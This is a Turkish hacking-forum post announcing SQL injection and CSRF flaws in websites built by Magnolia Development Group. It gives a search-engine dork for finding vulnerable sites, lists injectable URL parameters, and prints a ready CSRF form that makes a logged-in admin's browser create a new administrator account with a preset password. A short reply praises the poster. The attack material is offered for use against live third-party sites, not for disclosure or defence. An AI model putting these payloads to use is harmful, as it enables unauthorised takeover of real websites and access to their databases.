Tahribat.com Forumları
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Magnolia Development Group Multiple Sql-İnjection / CSRF Açıkları
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri
Magnolia Development Group Multiple Sql-İnjection / CSRF Açıkları
Magnolia Development Group Multiple Sql-İnjection / CSRF Açıkları
-
Magnolia Development Group un tasarımını yaptığı sitelerde sql injection ve CSRF açıkları var
sitelere her tasarladıkları sitenin altına ekledikleri yazıyı aratarak bulabilirsinizintext:"site by magnolia development group"
Sql injection açıkları
# http://[localhost]/project_detail.php?id='1 # http://[localhost]/project_detail.php?id=[SQLi] # http://[localhost]/gallery_detail.php?id='1 # http://[localhost]/gallery_detail.php?id=[SQLi] # http://[localhost]/*.php?*='1 # http://[localhost]/*.php?*=[SQLi]
birde CSRF olarak Yeni admin ekleme açığı aşağıdaki kodları isteğe göre düzenlenebilir.
admin girişleri siteadı.com/admin vs vs<html> <script language="javascript"> function Publish() { document.formlist.action.value="publish"; document.formlist.submit(); } function Unpublish() { document.formlist.action.value="unpublish"; document.formlist.submit(); } function Delete() { document.formlist.action.value="delete"; document.formlist.submit(); } </script> </head> <form action="http://site.com/admin/user_act.php" method="post" name="formdetail" id="formdetail"> <input type="hidden" name="user_id" value="" /> <input type="hidden" name="action" value="addnew" /> <table border="0" align="center" cellpadding="3" cellspacing="0"> <input name="user_name" type="text" id="user_name" value="admin"/> <input name="user_pwd" type="text" id="user_pwd" value="123456"/> <input name="user_email" type="text" id="user_email" value="admin@admin"/> <input type="submit" name="Submit" value="SAVE"/> <html>
-
serdarım yine moddasın eline sağlık :)
Toplam Hit: 842 Toplam Mesaj: 2